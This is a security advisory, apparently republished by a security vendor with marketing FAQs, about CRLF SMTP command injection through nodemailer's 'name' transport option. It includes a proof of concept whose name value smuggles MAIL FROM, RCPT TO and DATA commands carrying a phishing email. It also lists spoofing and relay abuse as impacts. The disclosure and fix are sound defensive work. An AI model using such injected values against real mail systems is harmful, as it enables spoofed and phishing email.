Summary
Nodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport name configuration option. The name value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (\r\n). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.
Details
The vulnerability exists in lib/smtp-connection/index.js. When establishing an SMTP connection, the name option is concatenated directly into the EHLO command:
// lib/smtp-connection/index.js, line 71
this.name = this.options.name || this._getHostname();
// line 1336
this._sendCommand('EHLO ' + this.name);
The _sendCommand method writes the string directly to the socket followed by \r\n (line 1082):
this._socket.write(Buffer.from(str + '\r\n', 'utf-8'));
If the name option contains \r\n sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the envelope.from and envelope.to fields which are validated for \r\n (line 1107-1119), and unlike envelope.size which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the name parameter receives no CRLF sanitization whatsoever.
This is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (name vs size), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.
The name option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.
PoC
const nodemailer = require('nodemailer');
const net = require('net');
// Simple SMTP server to observe injected commands
const server = net.createServer(socket => {
socket.write('220 test ESMTP\r\n');
socket.on('data', data => {
const lines = data.toString().split('\r\n').filter(l => l);
lines.forEach(line => {
console.log('SMTP CMD:', line);
if (line.startsWith('EHLO') || line.startsWith('HELO'))
socket.write('250 OK\r\n');
else if (line.startsWith('MAIL FROM'))
socket.write('250 OK\r\n');
else if (line.startsWith('RCPT TO'))
socket.write('250 OK\r\n');
else if (line === 'DATA')
socket.write('354 Go\r\n');
else if (line === '.')
socket.write('250 OK\r\n');
else if (line === 'QUIT')
{ socket.write('221 Bye\r\n'); socket.end(); }
else if (line === 'RSET')
socket.write('250 OK\r\n');
});
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
// Inject a complete phishing email via EHLO name
const transport = nodemailer.createTransport({
host: '127.0.0.1',
port: port,
secure: false,
name: 'legit.host\r\nMAIL FROM:<[email protected]>\r\n'
+ 'RCPT TO:<[email protected]>\r\nDATA\r\n'
+ 'From: [email protected]\r\nTo: [email protected]\r\n'
+ 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET'
});
transport.sendMail({
from: '[email protected]',
to: '[email protected]',
subject: 'Normal email',
text: 'Normal content'
}, () => { server.close(); process.exit(0); });
});
Running this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.
Impact
Who is affected: Applications that allow users or external input to configure the name SMTP transport option. This includes:
- Multi-tenant SaaS platforms with per-tenant SMTP configuration
- Admin panels where SMTP hostname/name settings are stored in databases
- Applications loading SMTP config from environment variables or external sources
What can an attacker do:
- Send unauthorized emails to arbitrary recipients by injecting MAIL FROM and RCPT TO commands
- Spoof email senders by injecting arbitrary From headers in the DATA portion
- Conduct phishing attacks using the legitimate SMTP server as a relay
- Bypass application-level controls on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO
- Perform SMTP reconnaissance by injecting commands like VRFY or EXPN
The injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.
Recommended fix: Sanitize the name option by stripping or rejecting CRLF sequences, similar to how envelope.from and envelope.to are already validated on lines 1107-1119 of lib/smtp-connection/index.js. For example:
this.name = (this.options.name || this._getHostname()).replace(/[\r\n]/g, '');
GHSA-VVJJ-XCJG-GR5G has a CVSS score of 4.9 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (8.0.5); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-VVJJ-XCJG-GR5G? GHSA-VVJJ-XCJG-GR5G is a medium-severity security vulnerability in nodemailer (npm), affecting versions <= 8.0.4. It is fixed in 8.0.5.
- How severe is GHSA-VVJJ-XCJG-GR5G? GHSA-VVJJ-XCJG-GR5G has a CVSS score of 4.9 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of nodemailer are affected by GHSA-VVJJ-XCJG-GR5G? nodemailer (npm) versions <= 8.0.4 is affected.
- Is there a fix for GHSA-VVJJ-XCJG-GR5G? Yes. GHSA-VVJJ-XCJG-GR5G is fixed in 8.0.5. Upgrade to this version or later.
- Is GHSA-VVJJ-XCJG-GR5G exploitable, and should I be worried? Whether GHSA-VVJJ-XCJG-GR5G is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-VVJJ-XCJG-GR5G is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-VVJJ-XCJG-GR5G? Upgrade
nodemailerto 8.0.5 or later.